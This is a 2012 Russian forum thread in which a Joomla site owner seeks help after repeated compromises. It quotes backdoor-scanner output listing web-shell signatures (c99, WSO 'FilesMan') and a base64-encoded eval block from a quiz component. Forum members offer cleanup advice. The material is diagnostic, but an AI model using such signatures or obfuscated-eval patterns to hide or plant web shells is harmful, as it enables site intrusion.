File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_ariquiz/templates/base/resultScale.base.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_ariquiz/templates/base/resultScale.base.html.php
String:: WebControls

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_ariquiz/templates/quiz_add.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_ariquiz/templates/questions/singlequestion.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_ariquiz/templates/questions/singlequestion.html.php
String:: WebControls

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_ariquiz/templates/questions/freetextquestion.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_ariquiz/templates/questions/freetextquestion.html.php
String:: WebControls

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_ariquiz/templates/questions/correlationquestion.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_ariquiz/templates/questions/correlationquestion.html.php
String:: WebControls

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_ariquiz/templates/questions/multiplequestion.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_ariquiz/templates/questions/multiplequestion.html.php
String:: WebControls

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_linkr/views/mm/view.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_linkr/views/css/tmpl/default.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_content/admin.content.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_rsform/admin.rsform.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_rsform/admin.rsform.html.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_rsform/admin.rsform.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_joomgallery/includes/html/admin.cssedit.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_joomgallery/includes/html/admin.votes.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_joomgallery/includes/admin.configuration.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_joomgallery/views/maintenance/tmpl/default_nametags.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_joomgallery/views/maintenance/tmpl/default_comments.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_joomgallery/views/maintenance/tmpl/default_votes.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/forum/adm/style/acp_mods.html
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/forum/docs/coding-guidelines.html
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/docs/CHANGELOG.html
String:: phpinfo()

Done

[вложение удалено Администратором]
« Последнее редактирование: 13.09.2012, 10:34:33 от robotwerder »
Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: взлом сайта
« Ответ #4 : 13.09.2012, 13:25:39 »
Проверяй
Спойлер
[свернуть]





Записан
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: взлом сайта
« Ответ #5 : 13.09.2012, 14:33:58 »
Многоватенько.. Проверил, обычный WSO. Удаляйте их к черту.
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: взлом сайта
« Ответ #6 : 13.09.2012, 14:54:42 »
или варьез сами поставили что скорей всего
File: /home/h1025/data/www/03-ektb.ru/includes/recaptcha/.svn/text-base/init.php
String:: c99

или залили в лог папку проинексили
File: /home/h1025/data/www/03-ektb.ru/logs/component.php
String:: default_action = 'FilesMan'
Записан
*

robotwerder

  • Захожу иногда
  • 248
  • 6 / 1
Re: взлом сайта
« Ответ #7 : 14.09.2012, 06:53:56 »


Многое чего удалил..некоторые файлы из представленных вами draff я не нашел..
есть компонент опросов  
в нем есть файл с подозрительным содержимым

Код
<?php
/** ARI Soft copyright
 * Copyright (C) 2008 ARI Soft.
 * All Rights Reserved.  No use, copying or distribution of this
 * work may be made except in accordance with a valid license
 * agreement from ARI Soft. This notice must be included on 
 * all copies, modifications and derivatives of this work.
 *
 * ARI Soft products are provided "as is" without warranty of 
 * any kind, either expressed or implied. In no event shall our 
 * juridical person be liable for any damages including, but 
 * not limited to, direct, indirect, special, incidental or 
 * consequential damages or other losses arising out of the use 
 * of or inability to use our products.
 *
**/

eval(base64_decode('IGdsb2JhbCAkbW9zQ29uZmlnX2Fic29sdXRlX3BhdGg7IGlmIChlbXB0eSgkbW9zQ29uZmlnX2Fic29sdXRlX3BhdGgpKSB7IGlmIChkZWZpbmVkKCdKUEFUSF9TSVRFJykpICRtb3NDb25maWdfYWJzb2x1dGVfcGF0aCA9IEpQQVRIX1NJVEU7IH0gJHYzMWQ0OWM0OSA9ICR2ZTlmNjQ2NzQgPSAkbW9zQ29uZmlnX2Fic29sdXRlX3BhdGggLiAnL2NvbXBvbmVudHMvY29tX2FyaXF1aXovJzskdmU5ZjY0Njc0ID0gJG1vc0NvbmZpZ19hYnNvbHV0ZV9wYXRoIC4gJy9hZG1pbmlzdHJhdG9yL2NvbXBvbmVudHMvY29tX2FyaXF1aXovJzsgcmVxdWlyZV9vbmNlICgkdmU5ZjY0Njc0IC4gJ2tlcm5lbC9jbGFzcy5BcmlLZXJuZWwucGhwJyk7IEFyaUtlcm5lbDo6aW1wb3J0KCdKb29tbGEuSm9vbWxhQnJpZGdlJyk7IGdsb2JhbCAkbW9zQ29uZmlnX2Fic29sdXRlX3BhdGgsICRvcHRpb24sICRteTtBcmlLZXJuZWw6OmltcG9ydCgnUEhQQ29tcGF0LkNvbXBhdFBIUDUweCcpOyBBcmlLZXJuZWw6OmltcG9ydCgnQ29uc3RhbnRzLkNsYXNzQ29uc3RhbnRzJyk7IEFyaUtlcm5lbDo6aW1wb3J0KCdDb25zdGFudHMuQ29uc3RhbnRzTWFuYWdlcicpOyBBcmlLZXJuZWw6OmltcG9ydCgnR2xvYmFsUHJlZnMuR2xvYmFsUHJlZnMnKTsgQXJpS2VybmVsOjppbXBvcnQoJ0NvbXBvbmVudHMuQXJpUXVpei5BcmlRdWl6Jyk7QXJpS2VybmVsOjppbXBvcnQoJ1dlYi5VdGlscy5XZWJIZWxwZXInKTsgQXJpS2VybmVsOjppbXBvcnQoJ1dlYi5UYXNrTWFuYWdlcicpOyBBcmlLZXJuZWw6OmltcG9ydCgnV2ViLlJlc3BvbnNlJyk7ICR2ZTBhZGIyYzkgPSYgYzI0MTRkZjYyOjpmNzEyM2E2OTkoKTsgJHZlMGFkYjJjOS0+ZmUzN2YwMTM2KCk7IGMzZWFlZDQyNTo6ZjU0ZjJmNThkKCk7YzhlMjE5NTc0OjpmZDFjMDZkN2QoJ3NjcmlwdCcsICR2MzFkNDljNDkgLiAnZnJvbnRlbmRfcGFnZXMvc2NyaXB0cy8nKTsgYzhlMjE5NTc0OjpmZDFjMDZkN2QoJycsICR2MzFkNDljNDkgLiAnZnJvbnRlbmRfcGFnZXMvJywgYXJyYXkoZDA2NDZmNzBmID0+ICR2MzFkNDljNDkgLiAndmlldy8nLCBkMDE3MzZhYjIgPT4gJ2h0bWwucGhwJykpOyBpZiAoZW1wdHkoJHRhc2spKSAkdGFzayA9ICdxdWl6X2xpc3QnO2lmICghYzhlMjE5NTc0OjpmOGIwN2QyM2YoJHRhc2spKSBjNTI0ZGE3ODk6OnJlZGlyZWN0KCdpbmRleC5waHA/b3B0aW9uPScgLiAkb3B0aW9uKTsgYzNlYWVkNDI1OjpmODNiODZlZmYoKTsgOw=='));
?>

компонент com_ariquiz очень нужен и при удалении файла ariquiz.php  не пашет..(

а так все удалил что представили, кроме тех что не нашел..
далее ждать новой атаки? или что нить предпринять?




Цитата: flyingspook от 13.09.2012, 14:54:42
или варьез сами поставили что скорей всего
File: /home/h1025/data/www/03-ektb.ru/includes/recaptcha/.svn/text-base/init.php
String:: c99

или залили в лог папку проинексили
File: /home/h1025/data/www/03-ektb.ru/logs/component.php
String:: default_action = 'FilesMan'

данного файла а так же нет..
Записан
*

sterden

  • Новичок
  • 7
  • 0 / 0
Re: взлом сайта
« Ответ #8 : 14.09.2012, 19:08:02 »
Вчера не смог войти в админку своего сайта. Пишет логин и пароль не соответствует друг другу. Пришлось сбрасывать пароль через базу данных. Почему такое может быть?
Записан
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: взлом сайта
« Ответ #9 : 14.09.2012, 19:14:12 »
сменили наверно... Ищите и латайте дыры
Записан
*

sterden

  • Новичок
  • 7
  • 0 / 0
Re: взлом сайта
« Ответ #10 : 14.09.2012, 19:17:04 »
А с чего начать, не подскажите? И ради чего могли сменить, вроде на сайте ничего не изменилось?
Записан
*

Dron79

  • Захожу иногда
  • 321
  • 37 / 0
  • Век живи - век учись!
Re: взлом сайта
« Ответ #11 : 14.09.2012, 19:54:09 »
я бы для начала удалил бы все не нужные компоненты, модули и плагины из системы и презалил все файлы из свежего дистрибутива, кроме конфигурационного и папки инстал,
а потом сравнивал все файлы по дате уделив пристальное внимание всем старичкам. Далее удалил бы всех ненужных пользователей из системы, особенно с правами выше зарегистрированного пользователя.
« Последнее редактирование: 14.09.2012, 19:57:39 от Dron79 »
Записан
кодинг на php.
*

sterden

  • Новичок
  • 7
  • 0 / 0
Re: взлом сайта
« Ответ #12 : 14.09.2012, 20:10:10 »
Пользователей на сайте, кроме меня нет. Но возле иконки пользователей вверху справа стоит цифра 5, хотя если нажать на пользователей в панели управления, то показывает только меня как администратора. Почему не понятно. Недавно делал бекап с помощью cpanel akeeba, но бекап с сайта не скачивал, может с этим связано?
Записан
*

Dron79

  • Захожу иногда
  • 321
  • 37 / 0
  • Век живи - век учись!
Re: взлом сайта
« Ответ #13 : 14.09.2012, 20:25:45 »
про пользователей не могу ничего сказать, не знаю с чем это связано.
использование cpanel akeeba может привести к заражению только если он скачан с варезника, да вообще в любой модуль, компонент, плагин можно всавить "черный вход в систему", все что скачено с варезника есле есть конечно такие приложения надо удалить.
Ну и главное поменять пароли к админке системы, к админке хостера, к базе данных и к своему почтовому ящику на имитостойкие и они должны быть все разные.
Записан
кодинг на php.
*

sterden

  • Новичок
  • 7
  • 0 / 0
Re: взлом сайта
« Ответ #14 : 14.09.2012, 20:35:38 »
Спасибо большое.
Записан
*

robotwerder

  • Захожу иногда
  • 248
  • 6 / 1
Re: взлом сайта
« Ответ #15 : 26.09.2012, 08:12:59 »
Затишье было, но не надолго, снова iframe .

привожу код heel and Basic Backdoor Script Finder
Снес еще пару модулей и компонент который упоминался в этом коде.
Не готов приводить Joomla к дефолтному состояний удаляя все модули подряд и компоненты, тем более что проблему это не решит..

Что из этого кажется подозрительным, может быть что то еще подскажете?

Код


Sheel and Basic Backdoor Script Finder www.1000in1.net

File: /home/h1025/data/www/03-ektb.ru/plugins/system/jalib/jaToolbar.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/plugins/system/jalib/libraries/CodeIgniter/plugins/captcha_pi.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/plugins/system/jalib/libraries/CodeIgniter/libraries/Validation.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/plugins/system/jalib/libraries/CodeIgniter/libraries/Trackback.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/plugins/system/jalib/libraries/CodeIgniter/libraries/Input.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/plugins/editors/jce/tiny_mce/plugins/spellchecker/rpc.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/media/rsinstall_4b4e97683cb4b/site/controller/functions.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/media/rsinstall_4b4e97683cb4b/site/submissions.class.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/media/rsinstall_4b4e97683cb4b/site/rsform.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/media/rsinstall_4b4e97683cb4b/admin/admin.rsform.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/media/rsinstall_4b4e97683cb4b/admin/admin.rsform.html.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/media/rsinstall_4b4e97683cb4b/admin/admin.rsform.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/components/com_glossary/controller-admin-classes/glossaryAdminConfig.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/components/com_jcomments/tpl/default/tpl_comment.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/components/com_jfusion/jfusionapi.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/components/com_mailto/controller.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/components/com_ariquiz/view/quiz_stat.html.php
String:: c99

File: /home/h1025/data/www/03-ektb.ru/components/com_content/models/safe-mod.php
String:: phpinfo()

File: /home/h1025/data/www/03-ektb.ru/components/com_content/models/safe-mod.php
String:: $_POST['pass']

File: /home/h1025/data/www/03-ektb.ru/components/com_content/models/safe-mod.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/components/com_joomgallery/includes/html/joom.viewdetails.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/components/com_joomgallery/includes/html/joom.userpanel.html.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/components/com_joomgallery/includes/html/joom.userpanel.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/components/com_joomgallery/includes/html/joom.favourites.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/components/com_joomgallery/includes/joom.slideshow.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/components/com_joomgallery/helpers/html/joomgallery.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/components/com_joomgallery/views/detail/tmpl/default.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/components/com_joomgallery/views/usercategories/tmpl/default.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/components/com_joomgallery/views/favourites/tmpl/list.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/components/com_joomgallery/views/userpanel/tmpl/default.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/includes/recaptcha/.svn/text-base/init.php
String:: c99

File: /home/h1025/data/www/03-ektb.ru/includes/framework.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/reputation.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/viewforum.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/portal/block/mini_cal.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/viewreputation.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/mcp.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/report.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/viewtopic.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/functions_user.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_email.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_users.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_recenttopics.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_rep_change_point.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_ban.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_stats.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_search.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_attachments.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_forums.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_board.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_gallery.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_disallow.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_rep_settings.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_gallery_albums.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_profile.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_portal.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_logs.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_altt.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_language.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_faq_manager.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_permission_roles.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_rep_ranks.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_captcha.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_reasons.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_bots.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_styles.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_permissions.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_inactive.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_groups.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_mods.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_gallery_permissions.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_sitemap_generator.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_ranks.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_jabber.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_modules.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_icons.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_gallery_config.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_phpbb_seo.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_prune.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_database.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_manage_attachments.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_words.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/auth/auth_jfusion.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/message_parser.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_gallery.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_groups.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_pm_options.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_resend.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_profile.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_main.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_attachments.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_remind.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_zebra.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_pm.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_register.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_prefs.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_pm_compose.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_pm_viewfolder.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/mcp/mcp_forum.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/mcp/mcp_topic.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/mcp/mcp_main.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/mcp/mcp_queue.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/mcp/mcp_ban.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/functions.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/startup.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/prime_trash_bin_2.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/functions_privmsgs.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/language/ru/acp/common.php
String:: phpinfo()

File: /home/h1025/data/www/03-ektb.ru/forum/gallery/mcp.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/gallery/posting.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/memberlist.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/umil/umil_auto.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/posting.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/thankslist.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/libraries/joomla/environment/request.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/libraries/joomla/html/toolbar/button/confirm.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_jdownloads/admin.jdownloads.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_trash/admin.trash.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_xmap/ajaxResponse.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_jcomments/admin.jcomments.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_jfusion/plugins/phpbb3/auth_jfusion.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_jfusion/plugins/vbulletin/admin.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_jfusion/plugins/vbulletin/hooks.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_jfusion/models/model.jfusion.php
String:: phpinfo()

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_jfusion/views/cpanel/tmpl/default.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_jfusion/views/versioncheck/tmpl/default.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_jfusion/views/syncoptions/tmpl/default.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_ariquiz/templates/questioncategory_list.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_ariquiz/templates/bankcategory_list.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_ariquiz/templates/base/resultScale.base.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_ariquiz/templates/base/resultScale.base.html.php
String:: WebControls

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_ariquiz/templates/quiz_add.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_ariquiz/templates/questions/singlequestion.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_ariquiz/templates/questions/singlequestion.html.php
String:: WebControls

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_ariquiz/templates/questions/freetextquestion.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_ariquiz/templates/questions/freetextquestion.html.php
String:: WebControls

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_ariquiz/templates/questions/correlationquestion.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_ariquiz/templates/questions/correlationquestion.html.php
String:: WebControls

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_ariquiz/templates/questions/multiplequestion.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_ariquiz/templates/questions/multiplequestion.html.php
String:: WebControls

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_content/admin.content.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_joomgallery/includes/html/admin.cssedit.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_joomgallery/includes/html/admin.votes.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_joomgallery/includes/admin.configuration.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_joomgallery/views/maintenance/tmpl/default_nametags.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_joomgallery/views/maintenance/tmpl/default_comments.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_joomgallery/views/maintenance/tmpl/default_votes.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/forum/adm/style/acp_mods.html
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/forum/docs/coding-guidelines.html
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/docs/CHANGELOG.html
String:: phpinfo()

Done

Записан
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: взлом сайта
« Ответ #16 : 26.09.2012, 08:38:48 »
Какие меры проводились для лечения сайта?
Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: взлом сайта
« Ответ #17 : 26.09.2012, 09:25:32 »
Цитата: wishlight от 26.09.2012, 08:38:48
Какие меры проводились для лечения сайта?
Да наверно никаких.Так и есть
Спойлер
[свернуть]
Записан
*

robotwerder

  • Захожу иногда
  • 248
  • 6 / 1
Re: взлом сайта
« Ответ #18 : 26.09.2012, 09:50:57 »
mod_rsform удален вместе с плагином и компонентом, еще снес ряд модулей вместе с файлами которые были указаны выше.. сменен пароль на ftp доступ

File: /home/h1025/data/www/03-ektb.ru/components/com_ariquiz/view/quiz_stat.html.php

с этим компонентом не хочется расставаться, но если придется то видимо придется...
Вопрос такой, почему heel and Basic Backdoor Script Finder  пишет что

File: /home/h1025/data/www/03-ektb.ru/components/com_ariquiz/view/quiz_stat.html.php  косяк тут..
открываю фалй и не вижу ничего подозрительного.. просто не знаю как работает скрипт, он же ищет лишь шеллы и доры , видимо ему кажется подозрительным этот файл и с ним тоже придется расстаться как и с компонентом com_ariquiz? и форумом тоже?

Записан
*

robotwerder

  • Захожу иногда
  • 248
  • 6 / 1
Re: взлом сайта
« Ответ #19 : 26.09.2012, 10:00:09 »
веду переписку с хостером..
цитата:

Цитировать
еще можно administrator/index.php удалить, а заливать только по мере необходимости, с помощью его хакеры то же творят , что хотят

глобально наверно решить можно только сменив движок, например от владельцев сайтов на друпале ни одного запроса по этой проблеме..с Joomlaми с этими одна головная боль...
 
либо следить усиленно и каждодневно, вычисляется это просто все, например модифицировался index.php или повился "левый" файл , засекается время модификации и смотрятся логи по этому времени и запросу POST (в ispmanager раздел "журналы"), там сразу видно с помощью чего писали...

Неужели все так печально господа?
Записан
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: взлом сайта
« Ответ #20 : 26.09.2012, 10:16:09 »
:))) еще на хтмл сайт сделать можно. Надо разобраться через что ломают.
Записан
*

robotwerder

  • Захожу иногда
  • 248
  • 6 / 1
Re: взлом сайта
« Ответ #21 : 26.09.2012, 11:19:23 »
Цитата: wishlight от 26.09.2012, 10:16:09
:))) еще на хтмл сайт сделать можно. Надо разобраться через что ломают.
Каким образом?
Методом исключения, то есть удаляя все файлы и модули? поочередно ?
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: взлом сайта
« Ответ #22 : 26.09.2012, 15:44:47 »
2robotwerder
не играйте и не учитесь на рабочих сайтах из переписки видно что вы в этой теме не сильно разбираетесь
наймите человека за оплату он вам сделает все, а ваше время потратите с пользой на другие вещи, иначе будет каждый раз топик все новыми сообщениями еженедельно добавляться
